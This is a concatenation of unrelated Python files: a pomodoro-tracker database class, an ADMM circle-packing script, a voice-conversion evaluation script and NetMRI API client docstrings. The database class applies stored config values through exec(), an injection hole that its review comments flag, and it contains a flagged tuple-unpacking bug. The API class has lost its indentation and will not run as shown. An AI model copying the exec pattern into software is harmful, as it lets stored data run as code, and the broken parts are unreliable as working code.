                self.cursor.execute("DELETE FROM tasks")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (1,'Education')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (2,'Research')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (3,'Learning')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (4,'Personal')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (5,'Config')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (6,'Project')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (20,'Reading')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (7 ,1,1,'<NAME>')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (8 ,2,9,'RUDIN')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (9 ,4,2,'Cumodoro')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (10,4,4,'Cookbook')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (11,5,5,'Vim')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (12,6,11,'MoSCHA')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (30,20,5,'Reading Club')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (31,20,18,'Research')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (13,8,6,'Paper')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (14,8,3,'Source')")
                self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (40,31,202,'Model Counting')")
            # Seed config defaults from the config module; best-effort.
            # NOTE(review): bare `except: pass` swallows every error here,
            # including missing config attributes -- confirm intentional.
            try:
                self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_SLOT',str(config.TIME_SLOT)))
                self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_SLOT_NAME',str(config.TIME_SLOT_NAME)))
                self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_POMODORO',str(config.TIME_POMODORO)))
                self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_BREAK',str(config.TIME_BREAK)))
            except: pass
            self.db.commit()
        except sql.Error as e:
            print("Query Error on creation:",e)
            sys.exit(1)
    def update_config(self,variable,value):
        """Persist one config variable as a string."""
        self.execute("UPDATE config SET value = ? WHERE variable == ?",(str(value),variable))
    def savepoint(self):
        """Open the single named savepoint; raises if one is already held."""
        if not self.has_savepoint:
            self.cursor.execute("savepoint cumodoro")
            self.has_savepoint = True
        else:
            raise DatabaseError("Savepoint already present")
    def rollback(self):
        """Roll back to the held savepoint; raises if none is held."""
        if self.has_savepoint:
            self.cursor.execute("rollback to savepoint cumodoro")
        else:
            raise DatabaseError("Cannot rollback: savepoint doesn't exist")
    def release(self):
        """Release the held savepoint; raises if none is held."""
        if self.has_savepoint:
            self.cursor.execute("release savepoint cumodoro")
            self.has_savepoint = False
        else:
            raise DatabaseError("Cannot release: savepoint doesn't exist")
    def load_config(self):
        """Load config rows into the config module, then call config.init().

        NOTE(review): values are applied via exec(), so database contents
        are executed as Python -- an injection risk if the DB is not
        trusted; confirm acceptable.
        """
        configlist = self.request("SELECT variable,value FROM config")
        if configlist != None:
            for variable,value in configlist:
                try:
                    # Try the value as a Python literal/expression first...
                    exec("config."+str(variable)+" = "+str(value))
                except:
                    # ...and fall back to assigning it as a string.
                    exec("config."+str(variable)+" = '"+str(value)+"'")
        else:
            log.debug("No config loaded from database")
        config.init()
    def load_tasks(self):
        """(Re)build the in-memory task tree, colors and chains from the DB."""
        if self.tasks != None:
            del self.tasks
            del self.colors
        self.full_task_list = {}
        self.task_list = {}
        self.tasks = {}
        # Synthetic root task (idx None) so every real task has a parent.
        t = Task()
        t.idx = None
        t.task = None
        t.color = 0
        t.active = 1
        t.desc = "None"
        self.tasks[t.idx] = t
        raw_tasks = self.request("SELECT id,task,color,active,desc FROM tasks")
        for entry in raw_tasks:
            idx, task, color, active, desc = entry
            t = Task()
            t.idx = idx
            t.task = task
            t.color = color
            t.active = active
            t.desc = desc
            self.tasks[idx] = t
            # task_list maps parent id -> list of child ids.
            if idx not in self.task_list:
                self.task_list[idx] = []
            if task not in self.task_list:
                self.task_list[task] = []
            self.task_list[task].append(idx)
        self.full_task_list = dict(self.task_list)
        self.colors = {None:[0]}
        self.levels = 0
        # Breadth-first walk from the root: collect each task's colour
        # chain (its ancestors' colours plus its own) and the tree depth,
        # pruning inactive subtrees from task_list as we go.
        if None in self.task_list:
            q = deque([[1,None,x] for x in self.task_list[None]])
            while q:
                level,parent,idx = q.popleft()
                if self.tasks[idx].active > 0:
                    q.extend([[level+1,idx,x] for x in self.task_list[idx]])
                    if idx not in self.colors:
                        self.colors.update({idx:[]})
                    color_list = []
                    if parent in self.colors:
                        color_list.extend(self.colors[parent])
                    self.colors[idx].extend(color_list)
                    self.colors[idx].append(self.tasks[idx].color)
                    if self.levels <= level:
                        self.levels = level + 1
                else:
                    # Inactive task: remove it and its subtree from task_list.
                    # NOTE(review): q2 items have 2 elements but are
                    # unpacked into 3 (level2,parent2,idx2) below -- this
                    # branch raises ValueError the first time a non-leaf
                    # inactive task is processed; confirm and fix.
                    q2 = deque([[idx,x] for x in self.task_list[idx]])
                    del self.task_list[parent][self.task_list[parent].index(idx)]
                    while q2:
                        level2,parent2,idx2 = q2.popleft()
                        q2.extend([[level2+1,idx2,x] for x in self.task_list[idx2]])
                        del self.task_list[idx2]
        # Pad every colour chain to the full tree depth by repeating the
        # last colour (or 0 for empty chains).
        for idx,color_list in self.colors.items():
            length = len(color_list)
            if length < self.levels:
                if length > 0:
                    self.colors[idx].extend([color_list[-1] for i in range(self.levels - length)])
                else:
                    self.colors[idx].extend([0 for i in range(self.levels - length)])
        self.task_chain = {None:[]}
        for task in self.tasks.keys():
            self.task_chain.update({task:self.find_task(task)})
    def find_task_rec(self,idx,l):
        """Depth-first search for *idx* under sibling list *l*.

        Returns the path as (task_id, sibling_index) pairs, or [].
        """
        for i in range(0,len(l)):
            if l[i] == idx:
                return [(l[i],i)]
            if l[i] in self.task_list:
                rl = self.find_task_rec(idx,self.task_list[l[i]])
                if len(rl) > 0:
                    rl.insert(0,(l[i],i))
                    return rl
        return []
    def find_task(self,idx):
        """Return the root-to-task path for *idx* as (id, index) pairs."""
        if None not in self.task_list:
            return []
        else:
            rl = self.find_task_rec(idx,self.task_list[None])
            return rl
    def get_pomodoros(self):
        # Not implemented yet.
        pass
    def sync(self,T):
        # Not implemented yet.
        pass
    def delete_task_rec(self,tl):
        """Recursively delete tasks in *tl* and detach their pomodoros."""
        for i in range(len(tl)):
            t = tl[i]
            self.delete_task_rec(self.task_list[t])
            log.debug("delete task "+str(t)+": "+str(self.task_list[t]))
            self.cursor.execute("DELETE FROM tasks WHERE id = ?",(t,))
            # Orphan this task's pomodoros instead of deleting them.
            self.cursor.execute("UPDATE pomodoros SET task = ? WHERE task = ?",(None,t))
    def delete_task(self,idx,immediate = False):
        """Delete task *idx* and its subtree; commits only if *immediate*."""
        self.connect()
        self.delete_task_rec([idx])
        if immediate:
            self.db.commit()
    def store_task(self,e):
        """Insert (idx is None) or update a Task-like object *e*; sets e.idx on insert."""
        if e.idx == None:
            data = (e.desc, e.color, e.active, e.task)
            self.execute("INSERT INTO tasks (desc,color,active,task) VALUES (?,?,?,?)",data)
            e.idx = self.cursor.lastrowid
        else:
            data = (e.desc, e.color, e.active, e.task, e.idx)
            self.execute("UPDATE tasks SET desc = ?, color = ?, active = ?, task = ? WHERE id = ?", data)
    def alter_pomodoro_task(self,idx,task,time=None,immediate=False):
        """Insert a pomodoro (idx is None) or re-assign an existing one to *task*."""
        if idx == None:
            self.execute("INSERT INTO pomodoros (time,duration,task) VALUES (?,?,?)", (time,config.TIME_POMODORO_SEC,task), immediate)
        else:
            self.execute("UPDATE pomodoros SET task = ? WHERE id == ?",(task,idx),immediate)
    def delete_pomodoro(self,idx,immediate=False):
        """Delete pomodoro *idx* (no-op when idx is None)."""
        if idx != None:
            self.execute("DELETE FROM pomodoros WHERE id = ?", (idx,), immediate)
    def add_pomodoro_now(self,task):
        """Record a pomodoro finishing now, optionally attached to *task*."""
        if task == None:
            self.execute("INSERT INTO pomodoros (time,duration) VALUES (?,?)",(datetime.datetime.now(),config.TIME_POMODORO_SEC))
        else:
            data = (datetime.datetime.now(),config.TIME_POMODORO_SEC,task)
            self.execute("INSERT INTO pomodoros (time,duration,task) VALUES (?,?,?)",data)
# --- file boundary (concatenation artifact) ---
# Circle packing in unit square using ADMM
# minimize \sum_{i,j} f_{ij}(z_i, z_j) + \sum_i g_i(z_i)
# f_{ij}(z_i, z_j) = 0, if ||z_i - z_j|| >= 2R
# = infinity, if ||z_i - z_j|| < 2R
# g_i(z_i) = 0, if R <= z_i <= 1 - R
# = infinity, otherwise
import numpy as np
import itertools
import matplotlib.pyplot as plt
import multiprocessing as mp
def get_ind(n):
    """Map a running index to each unordered pair (i, j), i < j, of n items."""
    pairs = itertools.combinations(range(n), 2)
    return {k: p for k, p in enumerate(pairs)}
# x_overlap = proximal operator of f
# x_box = proximal operator of g = projection of n_box on to a box
def prox_op(x_overlap, x_box, n_overlap, n_box, ind_map, R, n, N):
    """Proximal operators of the ADMM splitting; updates x_* in place.

    Overlap term (f): for each circle pair, centres at least 2R apart are
    kept; closer pairs are pushed apart symmetrically until their
    distance is exactly 2R.  Box term (g): each centre is projected onto
    the square [R, 1-R]^2.
    """
    for a, (i, j) in ind_map.items():
        diff = n_overlap[a][i] - n_overlap[a][j]
        d = np.linalg.norm(diff)
        if d >= 2 * R:
            # Non-overlapping: identity.
            x_overlap[a][i] = n_overlap[a][i]
            x_overlap[a][j] = n_overlap[a][j]
        else:
            # Move each centre (R - d/2) along the separating direction.
            push = (R - d / 2) * (diff / d)
            x_overlap[a][i] = n_overlap[a][i] + push
            x_overlap[a][j] = n_overlap[a][j] - push
    # Project every centre coordinate onto the feasible interval [R, 1-R].
    x_box[:] = np.clip(n_box, R, 1 - R)
    return x_overlap, x_box, n_overlap, n_box
def admm_rest_steps(x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box, n, ind_map, N, alpha):
    """Remaining ADMM steps after the proximal update.

    Rebinds m_*, z, n_* to fresh arrays, but updates u_overlap and u_box
    IN PLACE (+=), so the caller's dual arrays are mutated.  Returns the
    full updated state tuple.
    """
    # Update m:
    m_overlap = x_overlap + u_overlap
    m_box = x_box + u_box
    # Update z:
    m_accum = np.zeros((n, 2))
    # Get m_overlap:
    for key, value in ind_map.items():
        i = value[0]
        j = value[1]
        m_accum[i] += m_overlap[key][i]
        m_accum[j] += m_overlap[key][j]
    # Get m_box:
    m_accum += m_box
    # Average:
    # Each centre appears in (n-1) pair terms plus one box term = n terms.
    z = m_accum / n
    # Update u and n:
    u_overlap += (alpha * (x_overlap - z))
    n_overlap = z - u_overlap
    u_box += (alpha * (x_box - z))
    n_box = z - u_box
    return x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box
def circle_packing_admm(R, n, max_iter, alpha):
    """Pack n circles of radius R in the unit square via consensus ADMM.

    Runs max_iter iterations with step parameter alpha and returns the
    (n, 2) array of circle centres.
    """
    ind_map = get_ind(n)
    N = len(ind_map)
    pair_shape = (N, n, 2)
    single_shape = (n, 2)
    x_overlap = np.zeros(pair_shape)
    m_overlap = np.zeros(pair_shape)
    u_overlap = np.zeros(pair_shape)
    # Random start for the overlap inputs; everything else starts at zero.
    n_overlap = np.random.rand(*pair_shape)
    x_box = np.zeros(single_shape)
    m_box = np.zeros(single_shape)
    u_box = np.zeros(single_shape)
    n_box = np.zeros(single_shape)
    z = np.zeros(single_shape)
    for _ in range(max_iter):
        x_overlap, x_box, n_overlap, n_box = prox_op(
            x_overlap, x_box, n_overlap, n_box, ind_map, R, n, N)
        (x_overlap, x_box, m_overlap, m_box, z,
         u_overlap, u_box, n_overlap, n_box) = admm_rest_steps(
            x_overlap, x_box, m_overlap, m_box, z,
            u_overlap, u_box, n_overlap, n_box, n, ind_map, N, alpha)
    return z
if __name__ == '__main__':
    R = 0.125 # Radius
    n = 16 # Number of circles
    max_iter = 2000
    alpha = 0.005
    # Solve and print the final centres.
    z = circle_packing_admm(R, n, max_iter, alpha)
    print(z)
    # Draw circles:
    for p in z:
        circle= plt.Circle((p[0], p[1]), radius=R)
        ax = plt.gca()
        ax.add_patch(circle)
    # Draw unit box:
    box = plt.Rectangle((0, 0), 1, 1, fill=False)
    plt.gca().add_patch(box)
    plt.axis('scaled') # Make sure picture is not deformed
    plt.show()
# --- file boundary (concatenation artifact) ---
# Repository: chikiuso/vc2 (extraction marker converted to a comment)
import os
import glob
from models.cyclegan_vc2 import CycleGAN2
from speech_tools import *
# Offline conversion script: runs a trained CycleGAN-VC2 model in both
# directions (A->B and B->A) over the evaluation wav files and writes the
# converted audio next to the experiment outputs.
# NOTE(review): librosa, np, load_pickle, wav_padding, world_* and
# pitch_conversion are presumably provided by `speech_tools import *`
# above -- confirm.
dataset = 'vcc2018'
src_speaker = 'azure_val'
trg_speaker = 'xi_val'
model_name = 'cyclegan_vc2'
data_dir = os.path.join('datasets', dataset)
exp_dir = os.path.join('experiments', dataset)
eval_A_dir = os.path.join(data_dir, 'vcc2018_evaluation', src_speaker)
eval_B_dir = os.path.join(data_dir, 'vcc2018_reference', trg_speaker)
exp_A_dir = os.path.join(exp_dir, src_speaker)
exp_B_dir = os.path.join(exp_dir, trg_speaker)
validation_A_output_dir = os.path.join('experiments', dataset, model_name,
                                       'converted_{}_to_{}'.format(src_speaker, trg_speaker))
validation_B_output_dir = os.path.join('experiments', dataset, model_name,
                                       'converted_{}_to_{}'.format(trg_speaker, src_speaker))
os.makedirs(validation_A_output_dir, exist_ok=True)
os.makedirs(validation_B_output_dir, exist_ok=True)
# WORLD vocoder / feature-extraction settings.
sampling_rate = 22050
num_mcep = 36
frame_period = 5.0
n_frames = 128
print('Loading cached data...')
# Cached per-speaker normalisation statistics (MCEP mean/std, log-F0 mean/std).
coded_sps_A_norm, coded_sps_A_mean, coded_sps_A_std, log_f0s_mean_A, log_f0s_std_A = load_pickle(
    os.path.join(exp_A_dir, 'cache{}.p'.format(num_mcep)))
coded_sps_B_norm, coded_sps_B_mean, coded_sps_B_std, log_f0s_mean_B, log_f0s_std_B = load_pickle(
    os.path.join(exp_B_dir, 'cache{}.p'.format(num_mcep)))
model = CycleGAN2(num_features=num_mcep, batch_size=1, mode='test')
model.load(
    filepath=os.path.join('experiments', dataset, model_name, 'checkpoints', '{}_200000.ckpt'.format(model_name)))
print('Generating Validation Data B from A...')
for file in glob.glob(eval_A_dir + '/*.wav'):
    # Decompose -> convert pitch + spectral envelope -> resynthesise.
    wav, _ = librosa.load(file, sr=sampling_rate, mono=True)
    wav = wav_padding(wav=wav, sr=sampling_rate, frame_period=frame_period, multiple=4)
    f0, timeaxis, sp, ap = world_decompose(wav=wav, fs=sampling_rate, frame_period=frame_period)
    f0_converted = pitch_conversion(f0=f0, mean_log_src=log_f0s_mean_A, std_log_src=log_f0s_std_A,
                                    mean_log_target=log_f0s_mean_B, std_log_target=log_f0s_std_B)
    coded_sp = world_encode_spectral_envelop(sp=sp, fs=sampling_rate, dim=num_mcep)
    coded_sp_transposed = coded_sp.T
    coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std
    coded_sp_converted_norm = model.test(inputs=np.array([coded_sp_norm]), direction='A2B')[0]
    # The model may emit one extra frame; trim to the F0 length.
    if coded_sp_converted_norm.shape[1] > len(f0):
        coded_sp_converted_norm = coded_sp_converted_norm[:, :-1]
    coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean
    coded_sp_converted = coded_sp_converted.T
    coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
    decoded_sp_converted = world_decode_spectral_envelop(coded_sp=coded_sp_converted, fs=sampling_rate)
    wav_transformed = world_speech_synthesis(f0=f0_converted, decoded_sp=decoded_sp_converted, ap=ap, fs=sampling_rate,
                                             frame_period=frame_period)
    librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed,
                             sampling_rate)
print('Generating Validation Data A from B...')
# Same pipeline in the reverse direction (B -> A statistics and model path).
for file in glob.glob(eval_B_dir + '/*.wav'):
    wav, _ = librosa.load(file, sr=sampling_rate, mono=True)
    wav = wav_padding(wav=wav, sr=sampling_rate, frame_period=frame_period, multiple=4)
    f0, timeaxis, sp, ap = world_decompose(wav=wav, fs=sampling_rate, frame_period=frame_period)
    f0_converted = pitch_conversion(f0=f0, mean_log_src=log_f0s_mean_B, std_log_src=log_f0s_std_B,
                                    mean_log_target=log_f0s_mean_A, std_log_target=log_f0s_std_A)
    coded_sp = world_encode_spectral_envelop(sp=sp, fs=sampling_rate, dim=num_mcep)
    coded_sp_transposed = coded_sp.T
    coded_sp_norm = (coded_sp_transposed - coded_sps_B_mean) / coded_sps_B_std
    coded_sp_converted_norm = model.test(inputs=np.array([coded_sp_norm]), direction='B2A')[0]
    if coded_sp_converted_norm.shape[1] > len(f0):
        coded_sp_converted_norm = coded_sp_converted_norm[:, :-1]
    coded_sp_converted = coded_sp_converted_norm * coded_sps_A_std + coded_sps_A_mean
    coded_sp_converted = coded_sp_converted.T
    coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
    decoded_sp_converted = world_decode_spectral_envelop(coded_sp=coded_sp_converted, fs=sampling_rate)
    wav_transformed = world_speech_synthesis(f0=f0_converted, decoded_sp=decoded_sp_converted, ap=ap, fs=sampling_rate,
                                             frame_period=frame_period)
    librosa.output.write_wav(os.path.join(validation_B_output_dir, os.path.basename(file)), wav_transformed,
                             sampling_rate)
# --- file boundary (concatenation artifact) ---
# gh_stars: 0 (extraction marker converted to a comment)
from ..broker import Broker
class NeighborBroker(Broker):
controller = "neighbors"
def show(self, **kwargs):
"""Shows the details for the specified neighbor.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbor: The neighbor identified by the specified NeighborID.
:rtype neighbor: Neighbor
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available neighbors. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` NeighborID
:param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbors: An array of the Neighbor objects that match the specified input criteria.
:rtype neighbors: Array of Neighbor
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
    """Lists the available neighbors matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
    **Inputs**
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route.
    :type BGPRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route.
    :type BGPRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries.
    :type CDPInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries.
    :type CDPInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any).
    :type CDPNeighborID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any).
    :type CDPNeighborID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity.
    :type CombinedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity.
    :type CombinedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
    :type DataSourceID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
    :type DataSourceID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
    :type DeviceID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
    :type DeviceID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them).
    :type DirectEthernetInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them).
    :type DirectEthernetInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route.
    :type IGRPRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route.
    :type IGRPRoutedInd: Array of Boolean
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device.
    :type IPRoutedInd: Boolean
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device.
    :type IPRoutedInd: Array of Boolean
